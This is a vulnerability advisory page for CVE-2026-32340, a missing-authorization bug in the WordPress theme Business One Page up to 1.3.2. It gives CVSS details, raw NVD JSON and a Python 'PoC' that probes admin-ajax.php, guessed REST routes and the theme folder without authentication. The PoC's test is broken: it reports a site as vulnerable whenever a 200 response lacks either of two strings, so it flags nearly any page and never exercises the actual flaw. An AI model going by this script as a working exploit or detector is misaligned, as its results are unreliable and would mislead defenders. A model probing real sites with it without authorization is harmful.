Security Vulnerability Report
中文
CVE-2026-32340 CVSS 5.3 MEDIUM

CVE-2026-32340

Published: 2026-03-13 19:54:45
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme Business One Page business-one-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Business One Page: from n/a through <= 1.3.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

raratheme Business One Page <= 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32340 PoC - Missing Authorization in Business One Page Theme # Target: WordPress site using raratheme Business One Page theme <= 1.3.2 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32340 """ # Common AJAX endpoints in WordPress themes endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/business-one-page/v1/', '/?rest_route=/business-one-page/v1/', '/wp-content/themes/business-one-page/' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Try to access potentially unprotected functions # Without authentication, these should return 401/403 but may be accessible try: response = requests.get(url, timeout=10) # Check for missing authorization indicators if response.status_code == 200: # Check if response contains sensitive data without auth requirement if 'nonce' not in response.text or 'is_user_logged_in' not in response.text: vulnerable = True print(f'[+] Potential vulnerability found at: {url}') print(f' Status: {response.status_code}') except requests.RequestException as e: print(f'[-] Error accessing {url}: {e}') return vulnerable # Example usage if __name__ == '__main__': target = 'http://target-wordpress-site.com' if check_vulnerability(target): print('[!] Target appears to be vulnerable to CVE-2026-32340') else: print('[*] No obvious vulnerability detected')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32340", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:45.067", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Business One Page business-one-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Business One Page: from n/a through <= 1.3.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Business One Page business-one-page permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Business One Page: desde n/a hasta &lt;= 1.3.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/business-one-page/vulnerability/wordpress-business-one-page-theme-1-3-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}